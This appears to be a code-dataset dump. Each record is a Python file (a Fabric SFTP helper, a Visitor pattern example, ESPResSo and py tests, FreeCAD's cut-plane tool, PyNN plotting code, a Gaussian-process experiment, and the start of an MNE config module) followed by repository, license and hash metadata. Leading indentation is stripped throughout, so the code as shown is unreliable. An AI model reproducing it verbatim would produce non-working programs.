def put_dir(self, local_path, remote_path, use_sudo, mirror_local_mode,
mode):
if os.path.basename(local_path):
strip = os.path.dirname(local_path)
else:
strip = os.path.dirname(os.path.dirname(local_path))
remote_paths = []
for context, dirs, files in os.walk(local_path):
rcontext = context.replace(strip, '', 1)
rcontext = rcontext.lstrip('/')
rcontext = os.path.join(remote_path, rcontext)
if not self.exists(rcontext):
self.mkdir(rcontext, use_sudo)
for d in dirs:
n = os.path.join(rcontext, d)
if not self.exists(n):
self.mkdir(n, use_sudo)
for f in files:
local_path = os.path.join(context, f)
n = os.path.join(rcontext, f)
p = self.put(local_path, n, use_sudo, mirror_local_mode, mode,
True)
remote_paths.append(p)
return remote_paths
|
malin1993ml/h-store
|
third_party/python/fabric/sftp.py
|
Python
|
gpl-3.0
| 10,790
|
[
"VisIt"
] |
d5cb590b53d6b5cc2e7e29c12e05ccc140d2df410a6e827332ede09c183b05c6
|
"""
Represent an operation to be performed on the elements of an object
structure. Visitor lets you define a new operation without changing the
classes of the elements on which it operates.
"""
import abc
class Element(metaclass=abc.ABCMeta):
"""
Define an Accept operation that takes a visitor as an argument.
"""
@abc.abstractmethod
def accept(self, visitor):
pass
class ConcreteElementA(Element):
"""
Implement an Accept operation that takes a visitor as an argument.
"""
def accept(self, visitor):
visitor.visit_concrete_element_a(self)
class ConcreteElementB(Element):
"""
Implement an Accept operation that takes a visitor as an argument.
"""
def accept(self, visitor):
visitor.visit_concrete_element_b(self)
class Visitor(metaclass=abc.ABCMeta):
"""
Declare a Visit operation for each class of ConcreteElement in the
object structure. The operation's name and signature identifies the
class that sends the Visit request to the visitor. That lets the
visitor determine the concrete class of the element being visited.
Then the visitor can access the element directly through its
particular interface.
"""
@abc.abstractmethod
def visit_concrete_element_a(self, concrete_element_a):
pass
@abc.abstractmethod
def visit_concrete_element_b(self, concrete_element_b):
pass
class ConcreteVisitor1(Visitor):
"""
Implement each operation declared by Visitor. Each operation
implements a fragment of the algorithm defined for the corresponding
class of object in the structure. ConcreteVisitor provides the
context for the algorithm and stores its local state. This state
often accumulates results during the traversal of the structure.
"""
def visit_concrete_element_a(self, concrete_element_a):
pass
def visit_concrete_element_b(self, concrete_element_b):
pass
class ConcreteVisitor2(Visitor):
"""
Implement each operation declared by Visitor. Each operation
implements a fragment of the algorithm defined for the corresponding
class of object in the structure. ConcreteVisitor provides the
context for the algorithm and stores its local state. This state
often accumulates results during the traversal of the structure.
"""
def visit_concrete_element_a(self, concrete_element_a):
pass
def visit_concrete_element_b(self, concrete_element_b):
pass
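# Sketch of the double dispatch above: element.accept(visitor) forwards to the
# visitor method named after the element's concrete class, so a new operation
# only needs a new Visitor subclass (hypothetical example):
#
#   class LoggingVisitor(Visitor):
#       def visit_concrete_element_a(self, concrete_element_a):
#           print("visited A")
#       def visit_concrete_element_b(self, concrete_element_b):
#           print("visited B")
#
#   ConcreteElementB().accept(LoggingVisitor())   # prints "visited B"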
def main():
concrete_visitor_1 = ConcreteVisitor1()
concrete_element_a = ConcreteElementA()
concrete_element_a.accept(concrete_visitor_1)
if __name__ == "__main__":
main()
|
tcp813/mouTools
|
design_patterns/visitor.py
|
Python
|
mit
| 2,702
|
[
"VisIt"
] |
ac0d77b0baa165591e119af461ce23aadfb78b850e8167a4fb63ca163c2bd669
|
#
# Copyright (C) 2013,2014,2015,2016 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Tests particle property setters/getters
from __future__ import print_function
import unittest as ut
import espressomd
import numpy as np
class DomainDecomposition(ut.TestCase):
S = espressomd.System(box_l=[1.0, 1.0, 1.0])
def setUp(self):
self.S.part.clear()
self.S.cell_system.set_domain_decomposition(use_verlet_lists=False)
def test_resort(self):
n_part = 2351
# Add the particles on node 0, so that they have to be
# resorted
for i in range(n_part):
self.S.part.add(id=i, pos=[0, 0, 0], type=1)
# And now change their positions
for i in range(n_part):
            self.S.part[i].pos = np.random.random(3)
# Distribute the particles on the nodes
part_dist = self.S.cell_system.resort()
# Check that we did not lose particles
self.assertEqual(sum(part_dist), n_part)
# Check that we can still access all the particles
# This basically checks if part_node and local_particles
# is still in a valid state after the particle exchange
self.assertEqual(sum(self.S.part[:].type), n_part)
if __name__ == "__main__":
print("Features: ", espressomd.features())
ut.main()
|
KonradBreitsprecher/espresso
|
testsuite/domain_decomposition.py
|
Python
|
gpl-3.0
| 1,968
|
[
"ESPResSo"
] |
9a01ecb6ec21a20c921e162c262b7d891334461fdb3beb9757bb51f1336bf803
|
import py
import types
import sys
def checksubpackage(name):
obj = getattr(py, name)
if hasattr(obj, '__map__'): # isinstance(obj, Module):
keys = dir(obj)
assert len(keys) > 0
print (obj.__map__)
for name in list(obj.__map__):
assert hasattr(obj, name), (obj, name)
def test_dir():
for name in dir(py):
if not name.startswith('_'):
yield checksubpackage, name
def test_virtual_module_identity():
from py import path as path1
from py import path as path2
assert path1 is path2
from py.path import local as local1
from py.path import local as local2
assert local1 is local2
def test_importall():
base = py._pydir
nodirs = [
]
if sys.version_info >= (3,0):
nodirs.append(base.join('_code', '_assertionold.py'))
else:
nodirs.append(base.join('_code', '_assertionnew.py'))
def recurse(p):
return p.check(dotfile=0) and p.basename != "attic"
for p in base.visit('*.py', recurse):
if p.basename == '__init__.py':
continue
relpath = p.new(ext='').relto(base)
if base.sep in relpath: # not py/*.py itself
for x in nodirs:
if p == x or p.relto(x):
break
else:
relpath = relpath.replace(base.sep, '.')
modpath = 'py.%s' % relpath
try:
check_import(modpath)
except py.test.skip.Exception:
pass
def check_import(modpath):
py.builtin.print_("checking import", modpath)
assert __import__(modpath)
def test_all_resolves():
seen = py.builtin.set([py])
lastlength = None
while len(seen) != lastlength:
lastlength = len(seen)
for item in py.builtin.frozenset(seen):
for value in item.__dict__.values():
if isinstance(value, type(py.test)):
seen.add(value)
|
youtube/cobalt
|
third_party/web_platform_tests/tools/py/testing/root/test_py_imports.py
|
Python
|
bsd-3-clause
| 1,983
|
[
"VisIt"
] |
9cc83489ff2f333b26383df09210bf91b66b3415222fca34776d1537a2d07aac
|
#*****************************************************************************
#* Copyright (c) 2014 Jonathan Wiedemann <wood.galaxy@gmail.com> (cutplan) *
#* Copyright (c) 2019 Jerome Laverroux <jerome.laverroux@free.fr> (cutline)*
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#*****************************************************************************
import FreeCAD,ArchCommands
if FreeCAD.GuiUp:
import FreeCADGui
from PySide import QtCore, QtGui
from DraftTools import translate
else:
# \cond
def translate(ctxt,txt):
return txt
# \endcond
__title__="FreeCAD CutPlane"
__author__ = "Jonathan Wiedemann"
__url__ = "http://www.freecadweb.org"
## @package ArchCutPlane
# \ingroup ARCH
# \brief The Cut plane object and tools
#
# This module handles the Cut Plane object
def getPlanWithLine(line):
"""Function to make a plane along Normal plan"""
import Part
plan = FreeCAD.DraftWorkingPlane
w = plan.getNormal()
part = Part.Shape(line)
out = part.extrude(w)
return out
def cutComponentwithPlane(archObject, cutPlane, sideFace):
"""cut object from a plan define by a face, Behind = 0 , front = 1"""
cutVolume = ArchCommands.getCutVolume(cutPlane, archObject.Object.Shape)
if sideFace == 0:
cutVolume = cutVolume[2]
else:
cutVolume = cutVolume[1]
if cutVolume:
obj = FreeCAD.ActiveDocument.addObject("Part::Feature","CutVolume")
obj.Shape = cutVolume
obj.ViewObject.ShapeColor = (1.00,0.00,0.00)
obj.ViewObject.Transparency = 75
if "Additions" in archObject.Object.PropertiesList:
ArchCommands.removeComponents(obj,archObject.Object)
return None
else:
cutObj = FreeCAD.ActiveDocument.addObject("Part::Cut","CutPlane")
cutObj.Base = archObject.Object
cutObj.Tool = obj
return cutObj
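# Illustrative call (sketch only; requires an open document and two selected
# objects, the second providing the cutting face):
#
#   sel = FreeCADGui.Selection.getSelectionEx()
#   face = sel[1].SubObjects[0]
#   cutComponentwithPlane(sel[0], face, 0)   # 0 = behind, 1 = front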
class _CommandCutLine:
"the Arch CutPlane command definition"
def GetResources(self):
return {'Pixmap' : 'Arch_CutLine',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut with a line"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut an object with a line with normal workplane")}
def IsActive(self):
return len(FreeCADGui.Selection.getSelection()) > 1
def Activated(self):
sel = FreeCADGui.Selection.getSelectionEx()
if len(sel) != 2:
FreeCAD.Console.PrintError("You must select exactly two objects, the shape to be cut and a line\n")
return
if not sel[1].SubObjects:
FreeCAD.Console.PrintError("You must select a line from the second object (cut line), not the whole object\n")
return
panel=_CutPlaneTaskPanel(linecut=True)
FreeCADGui.Control.showDialog(panel)
class _CommandCutPlane:
"the Arch CutPlane command definition"
def GetResources(self):
return {'Pixmap' : 'Arch_CutPlane',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut with plane"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Arch_CutPlane","Cut an object with a plane")}
def IsActive(self):
return len(FreeCADGui.Selection.getSelection()) > 1
def Activated(self):
sel = FreeCADGui.Selection.getSelectionEx()
if len(sel) != 2:
FreeCAD.Console.PrintError("You must select exactly two objects, the shape to be cut and the cut plane\n")
return
if not sel[1].SubObjects:
FreeCAD.Console.PrintError("You must select a face from the second object (cut plane), not the whole object\n")
return
panel=_CutPlaneTaskPanel()
FreeCADGui.Control.showDialog(panel)
class _CutPlaneTaskPanel:
def __init__(self,linecut=False):
self.linecut=linecut
self.plan=None
if linecut:
self.plan = getPlanWithLine(FreeCADGui.Selection.getSelectionEx()[1].SubObjects[0])
        else:
self.plan = FreeCADGui.Selection.getSelectionEx()[1].SubObjects[0]
self.form = QtGui.QWidget()
self.form.setObjectName("TaskPanel")
self.grid = QtGui.QGridLayout(self.form)
self.grid.setObjectName("grid")
self.title = QtGui.QLabel(self.form)
self.grid.addWidget(self.title, 1, 0)
self.infoText = QtGui.QLabel(self.form)
self.grid.addWidget(self.infoText, 2, 0)
self.combobox = QtGui.QComboBox()
self.combobox.setCurrentIndex(0)
self.grid.addWidget(self.combobox, 2, 1)
QtCore.QObject.connect(self.combobox,QtCore.SIGNAL("currentIndexChanged(int)"),self.previewCutVolume)
self.previewObj = FreeCAD.ActiveDocument.addObject("Part::Feature","PreviewCutVolume")
self.retranslateUi(self.form)
self.previewCutVolume(self.combobox.currentIndex())
def isAllowedAlterSelection(self):
return False
def accept(self):
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
val = self.combobox.currentIndex()
s = FreeCADGui.Selection.getSelectionEx()
if len(s) > 1:
if s[1].SubObjects:
FreeCAD.ActiveDocument.openTransaction(translate("Arch","Cutting"))
FreeCADGui.addModule("Arch")
###TODO redo FreeCADGui.doCommand by using self.plan:
#FreeCADGui.doCommand("Arch.cutComponentwithPlane(FreeCADGui.Selection.getSelectionEx()[0],self.plan,"+ str(val) +")")
cutComponentwithPlane(FreeCADGui.Selection.getSelectionEx()[0],self.plan,val)
FreeCAD.ActiveDocument.commitTransaction()
FreeCAD.ActiveDocument.recompute()
return True
FreeCAD.Console.PrintError("Wrong selection\n")
return True
def reject(self):
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
FreeCAD.Console.PrintMessage("Cancel Cut Plane\n")
return True
def getStandardButtons(self):
return int(QtGui.QDialogButtonBox.Ok|QtGui.QDialogButtonBox.Cancel)
def previewCutVolume(self, i):
cutVolume = ArchCommands.getCutVolume(self.plan,FreeCADGui.Selection.getSelectionEx()[0].Object.Shape)
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
self.previewObj = FreeCAD.ActiveDocument.addObject("Part::Feature", "PreviewCutVolume")
self.previewObj.ViewObject.ShapeColor = (1.00,0.00,0.00)
self.previewObj.ViewObject.Transparency = 75
if i == 1:
cutVolume = cutVolume[1]
else:
cutVolume = cutVolume[2]
if cutVolume:
self.previewObj.Shape = cutVolume
def retranslateUi(self, TaskPanel):
TaskPanel.setWindowTitle(QtGui.QApplication.translate("Arch", "Cut Plane", None))
self.title.setText(QtGui.QApplication.translate("Arch", "Cut Plane options", None))
self.infoText.setText(QtGui.QApplication.translate("Arch", "Which side to cut", None))
self.combobox.addItems([QtGui.QApplication.translate("Arch", "Behind", None),
QtGui.QApplication.translate("Arch", "Front", None)])
if FreeCAD.GuiUp:
FreeCADGui.addCommand('Arch_CutPlane',_CommandCutPlane())
FreeCADGui.addCommand('Arch_CutLine', _CommandCutLine())
|
sanguinariojoe/FreeCAD
|
src/Mod/Arch/ArchCutPlane.py
|
Python
|
lgpl-2.1
| 8,639
|
[
"Galaxy"
] |
9be4d8032446f29d15ee959b985f0273a0dee7ea439c1f7970cd178ea1db7dcf
|
"""
Simple tools for plotting Neo-format data.
These tools are intended for quickly producing basic plots with simple
formatting. If you need to produce more complex and/or publication-quality
figures, it will probably be easier to use matplotlib or another plotting
package directly rather than trying to extend this module.
:copyright: Copyright 2006-2016 by the PyNN team, see AUTHORS.
:license: CeCILL, see LICENSE for details.
"""
from collections import defaultdict
from numbers import Number
from itertools import repeat
from os import path, makedirs
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
from quantities import ms
from neo import AnalogSignal, SpikeTrain
try:
from sys import maxint
except ImportError: # Py3
from sys import maxsize as maxint
DEFAULT_FIG_SETTINGS = {
'lines.linewidth': 0.5,
'axes.linewidth': 0.5,
'axes.labelsize': 'small',
'legend.fontsize': 'small',
'font.size': 8,
'savefig.dpi': 150,
}
def handle_options(ax, options):
if "xticks" not in options or options.pop("xticks") is False:
plt.setp(ax.get_xticklabels(), visible=False)
if "xlabel" in options:
ax.set_xlabel(options.pop("xlabel"))
if "yticks" not in options or options.pop("yticks") is False:
plt.setp(ax.get_yticklabels(), visible=False)
if "ylabel" in options:
ax.set_ylabel(options.pop("ylabel"))
if "ylim" in options:
ax.set_ylim(options.pop("ylim"))
if "xlim" in options:
ax.set_xlim(options.pop("xlim"))
def plot_signal(ax, signal, index=None, label='', **options):
"""
Plot a single channel from an AnalogSignal.
"""
if "ylabel" in options:
if options["ylabel"] == "auto":
options["ylabel"] = "%s (%s)" % (signal.name,
signal.units._dimensionality.string)
handle_options(ax, options)
if index is None:
label = "%s (Neuron %d)" % (label, signal.channel_index or 0)
else:
label = "%s (Neuron %d)" % (label, signal.channel_index[index])
signal = signal[:, index]
ax.plot(signal.times.rescale(ms), signal, label=label, **options)
ax.legend()
def plot_signals(ax, signal_array, label_prefix='', **options):
"""
Plot all channels in an AnalogSignal in a single panel.
"""
if "ylabel" in options:
if options["ylabel"] == "auto":
options["ylabel"] = "%s (%s)" % (signal_array.name,
signal_array.units._dimensionality.string)
handle_options(ax, options)
offset = options.pop("y_offset", None)
show_legend = options.pop("legend", True)
for i in signal_array.channel_index.index.argsort():
channel = signal_array.channel_index.index[i]
signal = signal_array[:, i]
if label_prefix:
label = "%s (Neuron %d)" % (label_prefix, channel)
else:
label = "Neuron %d" % channel
if offset:
signal += i * offset
ax.plot(signal.times.rescale(ms), signal, label=label, **options)
if show_legend:
ax.legend()
def plot_spiketrains(ax, spiketrains, label='', **options):
"""
Plot all spike trains in a Segment in a raster plot.
"""
ax.set_xlim(0, spiketrains[0].t_stop / ms)
handle_options(ax, options)
max_index = 0
min_index = maxint
for spiketrain in spiketrains:
ax.plot(spiketrain,
np.ones_like(spiketrain) * spiketrain.annotations['source_index'],
'k.', **options)
max_index = max(max_index, spiketrain.annotations['source_index'])
min_index = min(min_index, spiketrain.annotations['source_index'])
ax.set_ylabel("Neuron index")
ax.set_ylim(-0.5 + min_index, max_index + 0.5)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def plot_array_as_image(ax, arr, label='', **options):
"""
Plots a numpy array as an image.
"""
handle_options(ax, options)
show_legend = options.pop("legend", True)
plt.pcolormesh(arr, **options)
ax.set_aspect('equal')
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
if show_legend:
plt.colorbar()
def scatterplot(ax, data_table, label='', **options):
handle_options(ax, options)
if options.pop("show_fit", False):
plt.plot(data_table.x, data_table.y_fit, 'k-')
plt.scatter(data_table.x, data_table.y, **options)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def plot_hist(ax, histogram, label='', **options):
handle_options(ax, options)
for t, n in histogram:
ax.bar(t, n, width=histogram.bin_width, color=None)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def variable_names(segment):
"""
List the names of all the AnalogSignals (used for the variable name by
PyNN) in the given segment.
"""
return set(signal.name for signal in segment.analogsignals)
class Figure(object):
"""
Provide simple, declarative specification of multi-panel figures.
Example::
Figure(
            Panel(segment.filter(name="v")[0], ylabel="Membrane potential (mV)"),
Panel(segment.spiketrains, xlabel="Time (ms)"),
title="Network activity",
).save("figure3.png")
Valid options are:
`settings`:
for figure settings, e.g. {'font.size': 9}
`annotations`:
a (multi-line) string to be printed at the bottom of the figure.
`title`:
a string to be printed at the top of the figure.
"""
def __init__(self, *panels, **options):
n_panels = len(panels)
if "settings" in options and options["settings"] is not None:
settings = options["settings"]
else:
settings = DEFAULT_FIG_SETTINGS
plt.rcParams.update(settings)
width, height = options.get("size", (6, 2 * n_panels + 1.2))
self.fig = plt.figure(1, figsize=(width, height))
gs = gridspec.GridSpec(n_panels, 1)
if "annotations" in options:
gs.update(bottom=1.2 / height) # leave space for annotations
gs.update(top=1 - 0.8 / height, hspace=0.25)
#print(gs.get_grid_positions(self.fig))
for i, panel in enumerate(panels):
panel.plot(plt.subplot(gs[i, 0]))
if "title" in options:
self.fig.text(0.5, 1 - 0.5 / height, options["title"],
ha="center", va="top", fontsize="large")
if "annotations" in options:
plt.figtext(0.01, 0.01, options["annotations"], fontsize=6, verticalalignment='bottom')
def save(self, filename):
"""
Save the figure to file. The format is taken from the file extension.
"""
dirname = path.dirname(filename)
if dirname and not path.exists(dirname):
makedirs(dirname)
self.fig.savefig(filename)
class Panel(object):
"""
Represents a single panel in a multi-panel figure.
    A panel is a Matplotlib Axes or Subplot instance. A data item may be an
    AnalogSignal, a list of SpikeTrains, a DataTable, a Histogram, or a 2D
    NumPy array. The Panel will
automatically choose an appropriate representation. Multiple data items may
be plotted in the same panel.
Valid options are any valid Matplotlib formatting options that should be
applied to the Axes/Subplot, plus in addition:
`data_labels`:
a list of strings of the same length as the number of data items.
`line_properties`:
a list of dicts containing Matplotlib formatting options, of the
same length as the number of data items.
"""
def __init__(self, *data, **options):
self.data = list(data)
self.options = options
self.data_labels = options.pop("data_labels", repeat(None))
self.line_properties = options.pop("line_properties", repeat({}))
def plot(self, axes):
"""
Plot the Panel's data in the provided Axes/Subplot instance.
"""
for datum, label, properties in zip(self.data, self.data_labels, self.line_properties):
properties.update(self.options)
if isinstance(datum, DataTable):
scatterplot(axes, datum, label=label, **properties)
elif isinstance(datum, Histogram):
plot_hist(axes, datum, label=label, **properties)
elif isinstance(datum, AnalogSignal):
plot_signals(axes, datum, label_prefix=label, **properties)
elif isinstance(datum, list) and len(datum) > 0 and isinstance(datum[0], SpikeTrain):
plot_spiketrains(axes, datum, label=label, **properties)
elif isinstance(datum, np.ndarray):
if datum.ndim == 2:
plot_array_as_image(axes, datum, label=label, **properties)
else:
raise Exception("Can't handle arrays with %s dimensions" % datum.ndim)
else:
raise Exception("Can't handle type %s" % type(datum))
def comparison_plot(segments, labels, title='', annotations=None,
fig_settings=None, with_spikes=True):
"""
Given a list of segments, plot all the data they contain so as to be able
to compare them.
Return a Figure instance.
"""
variables_to_plot = set.union(*(variable_names(s) for s in segments))
print("Plotting the following variables: %s" % ", ".join(variables_to_plot))
# group signal arrays by name
n_seg = len(segments)
by_var_and_channel = defaultdict(lambda: defaultdict(list))
line_properties = []
for k, (segment, label) in enumerate(zip(segments, labels)):
lw = 2 * (n_seg - k) - 1
col = 'rbgmck'[k % 6]
line_properties.append({"linewidth": lw, "color": col})
for array in segment.analogsignals:
for i in array.channel_index.argsort():
channel = array.channel_index[i]
signal = array[:, i]
signal.channel_index = channel # Neo should do this in the previous line
by_var_and_channel[array.name][channel].append(signal)
# each panel plots the signals for a given variable.
panels = []
for by_channel in by_var_and_channel.values():
panels += [Panel(*array_list,
line_properties=line_properties,
data_labels=labels) for array_list in by_channel.values()]
if with_spikes and len(segments[0].spiketrains) > 0:
panels += [Panel(segment.spiketrains, data_labels=[label])
for segment, label in zip(segments, labels)]
panels[-1].options["xticks"] = True
panels[-1].options["xlabel"] = "Time (ms)"
fig = Figure(*panels,
title=title,
settings=fig_settings,
annotations=annotations)
return fig
class DataTable(object):
"""A lightweight encapsulation of x, y data for scatterplots."""
def __init__(self, x, y):
self.x = x
self.y = y
def fit_curve(self, f, p0, **fitting_parameters):
from scipy.optimize import curve_fit
self._f = f
self._p0 = p0
self._popt, self._pcov = curve_fit(f, self.x, self.y, p0, **fitting_parameters)
return self._popt, self._pcov
@property
def y_fit(self):
return self._f(self.x, *self._popt)
class Histogram(object):
"""A lightweight encapsulation of histogram data."""
def __init__(self, data):
self.data = data
self.evaluated = False
def evaluate(self):
if not self.evaluated:
n_bins = int(np.sqrt(len(self.data)))
self.values, self.bins = np.histogram(self.data, bins=n_bins)
self.bin_width = self.bins[1] - self.bins[0]
self.evaluated = True
def __iter__(self):
"""Iterate over the bars of the histogram"""
self.evaluate()
for x, y in zip(self.bins[:-1], self.values):
yield (x, y)
def isi_histogram(segment):
all_isis = np.concatenate([np.diff(np.array(st)) for st in segment.spiketrains])
return Histogram(all_isis)
|
anupkdas-nus/global_synapses
|
pyNN-dispackgaes/utility/plotting.py
|
Python
|
gpl-3.0
| 12,674
|
[
"NEURON"
] |
990b233b3f2be3fa67c171304725332eaad01dd8fd13d72d916e613e16c6d9b5
|
"""None"""
import time
import os
import numpy as np
from sklearn.grid_search import ParameterGrid
from sklearn.base import clone
from sklearn.gaussian_process import GaussianProcess
from scipy.stats import norm
from joblib import Parallel, delayed
from utils.state import _save
from utils.functions import gaussian
from utils.conformal import RRCM, CRR
from utils.KRR import KRR_AB
np.seterr(all="ignore")
BASE_PATH = os.path.join(".", "exp_gauss_1d")
if not os.path.exists(BASE_PATH):
os.mkdir(BASE_PATH)
n_jobs, verbose = -1, 0
parallel_ = Parallel(n_jobs=n_jobs, verbose=verbose)
## The levels and the random state
seeds_ = [0xB5066DBC, 0x98E8576F, 0x3161F88E, 0x08CCA9D9,]
random_state = np.random.RandomState(seeds_[1])
levels = np.asanyarray([0.01, 0.05, 0.10, 0.25])[::-1]
## helpers
def _helper(y, A, B, proc=RRCM, levels=levels, parallel=None, n_jobs=1, verbose=0):
if not isinstance(parallel, Parallel):
parallel = Parallel(n_jobs=n_jobs, verbose=verbose)
regions = parallel(delayed(proc)(A[k], B[k], levels=levels)
for k in xrange(y.shape[0]))
hits_ = np.asarray(
[[np.any(((int_[:, 0] <= target) & (target <= int_[:, 1]))).astype(float)
for int_ in region]
for target, region in zip(y, regions)])
width_ = np.asarray(
[[np.sum(int_[:, 1] - int_[:, 0]) for int_ in region] for region in regions])
bounds_ = np.asarray(
[[[int_[:, 0].min(), int_[:, 1].max()] for int_ in region] for region in regions])
return hits_, width_, bounds_
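# _helper returns, per test point and confidence level, whether the true target
# lies in the union of predicted intervals (hits), the total interval length
# (width) and the outer envelope [min lower, max upper] (bounds).  Expected
# shapes, assuming y has n points:
#
#   hits_.shape   == (n, len(levels))
#   width_.shape  == (n, len(levels))
#   bounds_.shape == (n, len(levels), 2)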
## Define the grid
true_theta = 100.0
true_nugget = [1e-6, 1e-1,]
grid_ = ParameterGrid(dict(size=[25, 50, 100, 200, 400, 600, 800, 1000, 1200, 1400, 1600,],
nugget=true_nugget,
theta0=[1e+1, 1e+2, 1e+3, "auto"]))
## Initialize
kernel = 'rbf' # 'laplacian'
gp = GaussianProcess(beta0=0, normalize=False, corr='squared_exponential')
# Generate input
XX_test = np.linspace(0, 1, num=1001).reshape((-1, 1))
XX_train = random_state.uniform(size=(10000, 1))
XX = np.concatenate([XX_test, XX_train], axis=0)
test_ = np.s_[:XX_test.shape[0]]
experiment, batch_, dumps_ = list(), 1, list()
for noise_ in true_nugget:
yy = gaussian(XX, scale=1.0, nugget=noise_, metric=kernel,
gamma=true_theta, random_state=random_state)
if yy.ndim == 1:
yy = yy.reshape((-1, 1))
## Split the pooled sample
yy_train, yy_test = np.delete(yy, test_, axis=0), yy[test_].copy()
for i_, par_ in enumerate(grid_):
print i_, par_
size_, nugget_, theta0_ = par_['size'], par_['nugget'], par_['theta0']
tick_ = time.time()
n_replications, replications = 25, list()
while n_replications > 0:
## Draw random train sample
train_ = random_state.choice(range(XX_train.shape[0]),
size=size_, replace=False)
X, y = XX_train[train_], yy_train[train_]
## Fit a GPR
gp_ = clone(gp)
gp_.nugget = nugget_
if isinstance(theta0_, float):
gp_.theta0 = theta0_
elif theta0_ == "auto":
gp_.thetaL, gp_.thetaU, gp_.theta0 = 1.0, 1e4, float(size_)
gp_.fit(X, y)
## Compute the A, B matrices
A, B, y_hat_, MM, loo_, A_loo, B_loo = \
KRR_AB(X, y, XX_test, forecast=True,
nugget=gp_.nugget, metric=kernel, gamma=gp_.theta_[0])
del loo_
## Construct the CKRR confidence interval: RRCM
rrcm_hits_, rrcm_width_, rrcm_bounds_ = \
_helper(yy_test, A[0], B, proc=RRCM,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: CCR-sided
crr_hits_, crr_width_, crr_bounds_ = \
_helper(yy_test, A[0], B, proc=CRR,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: RRCM
loo_rrcm_hits_, loo_rrcm_width_, loo_rrcm_bounds_ = \
_helper(yy_test, A_loo[0], B_loo, proc=RRCM,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: CCR-sided
loo_crr_hits_, loo_crr_width_, loo_crr_bounds_ = \
_helper(yy_test, A_loo[0], B_loo, proc=CRR,
levels=levels, parallel=parallel_)
## Construct the GPR forecast interval
z_a = norm.ppf(1 - .5 * levels)
half_width_ = np.sqrt(MM * gp_.sigma2) * z_a[np.newaxis]
bf_bounds_ = np.stack([y_hat_ - half_width_, y_hat_ + half_width_], axis=-1)
bf_width_ = bf_bounds_[..., 1] - bf_bounds_[..., 0]
bf_hits_ = ((bf_bounds_[..., 0] <= yy_test)
& (yy_test <= bf_bounds_[..., 1])).astype(float)
## Construct the GPR prediction interval
half_width_ = np.sqrt((MM - gp_.nugget) * gp_.sigma2) * z_a[np.newaxis]
bp_bounds_ = np.stack([y_hat_ - half_width_, y_hat_ + half_width_], axis=-1)
bp_width_ = bp_bounds_[..., 1] - bp_bounds_[..., 0]
bp_hits_ = ((bp_bounds_[..., 0] <= yy_test)
& (yy_test <= bp_bounds_[..., 1])).astype(float)
n_replications -= 1
replications.append((yy_test[:, 0], y_hat_[:, 0],
bp_width_, bp_hits_.mean(axis=0, keepdims=False),
bf_width_, bf_hits_.mean(axis=0, keepdims=False),
rrcm_width_, rrcm_hits_.mean(axis=0, keepdims=False),
crr_width_, crr_hits_.mean(axis=0, keepdims=False),
loo_rrcm_width_, loo_rrcm_hits_.mean(axis=0, keepdims=False),
loo_crr_width_, loo_crr_hits_.mean(axis=0, keepdims=False)))
tock_ = time.time()
print "%0.3fsec"%(tock_-tick_,)
key_ = "gaussian", noise_, theta0_, nugget_, size_
result_ = tuple(np.stack([rep_[j] for rep_ in replications], axis=-1) for j in xrange(14))
experiment.append((key_,) + result_)
if len(experiment) >= 25:
basename_ = os.path.join(BASE_PATH, "exp_gauss_1d%04d"%(batch_,))
dumps_.append(_save(experiment, basename_, gz=9))
experiment, batch_ = list(), batch_ + 1
if len(experiment) > 0:
basename_ = os.path.join(BASE_PATH, "exp_gauss_1d%04d"%(batch_,))
dumps_.append(_save(experiment, basename_, gz=9))
|
ivannz/study_notes
|
year_15_16/thesis/notebooks/gaussian_exp_1d.py
|
Python
|
mit
| 6,636
|
[
"Gaussian"
] |
1a0418f2794621d87f38e24804e90d4009e4457c12cf63076f2120a1827adb43
|
# -*- coding: utf-8 -*-
"""The config functions."""
# Authors: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD-3-Clause
import atexit
from functools import partial
import json
import os
import os.path as op
import platform
import shutil
import sys
import tempfile
import re
import numpy as np
from .check import (_validate_type, _check_pyqt5_version, _check_option,
_check_fname)
from .docs import fill_doc
from ._logging import warn, logger
_temp_home_dir = None
def set_cache_dir(cache_dir):
"""Set the directory to be used for temporary file storage.
This directory is used by joblib to store memmapped arrays,
which reduces memory requirements and speeds up parallel
computation.
Parameters
----------
